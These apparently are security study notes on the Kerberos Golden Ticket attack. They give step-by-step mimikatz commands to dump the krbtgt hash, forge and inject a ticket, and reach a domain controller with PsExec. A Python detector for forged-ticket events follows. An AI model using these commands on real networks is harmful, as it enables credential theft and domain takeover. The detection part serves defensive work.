Golden Ticket attack

Going back to the explanation of Kerberos authentication, we recall that when a user submits a request for a TGT, the KDC encrypts the TGT with a secret key known only to the KDCs in the domain. This secret key is actually the password hash of a domain user account called krbtgt. If we are able to get our hands on the krbtgt password hash, we can create our own self-made custom TGTs, or golden tickets.

  1. mimikatz.exe
  2. privilege::debug
  3. lsadump::lsa /patch

     to get the krbtgt NTLM hash
  4. kerberos::purge
  5. kerberos::golden /user:<fakeuser> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt ntlm hash> /ptt
  6. misc::cmd
  7. psexec.exe \\<dc_machine> cmd.exe

     With the golden ticket injected into memory, we can launch a new command prompt with misc::cmd and again attempt lateral movement with PsExec.
  8. whoami
  9. whoami /groups for verification
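From the defender's side, the steps above leave two traces on the domain controller: the forged TGT is made for a user (<fakeuser>) that need not exist in the directory, and the TGT itself was never issued by the KDC, so service-ticket requests (event 4769) appear without a matching TGT request (event 4768). The following is an added example, not part of the original notes; the simplified log format, the sample lines and the known-account set are constructed for illustration.

```python
"""Flag service-ticket requests that look like golden ticket use (added example).

Signals: a 4769 (service ticket requested) for an account unknown to the
directory, or a 4769 for an account/client pair with no earlier 4768 (TGT
requested) on this DC. Log lines below are constructed, not real telemetry.
"""
import re

# Constructed, simplified DC security-log lines: <time> <event_id> <account> <client_ip>
SAMPLE_LOG = """\
08:00:01 4768 alice 10.0.0.21
08:00:02 4769 alice 10.0.0.21
08:05:10 4769 fakeadmin 10.0.0.42
08:06:00 4769 bob 10.0.0.33
"""

# Constructed stand-in for an export of real account names from the directory.
KNOWN_ACCOUNTS = {"alice", "bob", "administrator"}

LINE_RE = re.compile(r"^(\S+) (4768|4769) (\S+) (\S+)$")


def parse(log):
    """Yield (time, event_id, account, client_ip) for each well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group(1), int(m.group(2)), m.group(3).lower(), m.group(4)


def find_suspicious(log, known_accounts):
    """Return (reason, account, client_ip) for each 4769 that looks forged.

    Caveat: a TGT issued by another DC, or one still valid from before the log
    window, also yields a 4769 with no local 4768; treat hits as leads to triage.
    """
    seen_tgt = set()  # (account, client_ip) pairs that requested a TGT here
    hits = []
    for _time, event_id, account, client_ip in parse(log):
        if event_id == 4768:
            seen_tgt.add((account, client_ip))
        elif event_id == 4769:
            if account not in known_accounts:
                hits.append(("unknown account", account, client_ip))
            elif (account, client_ip) not in seen_tgt:
                hits.append(("no prior TGT request", account, client_ip))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG, KNOWN_ACCOUNTS):
        print(hit)
```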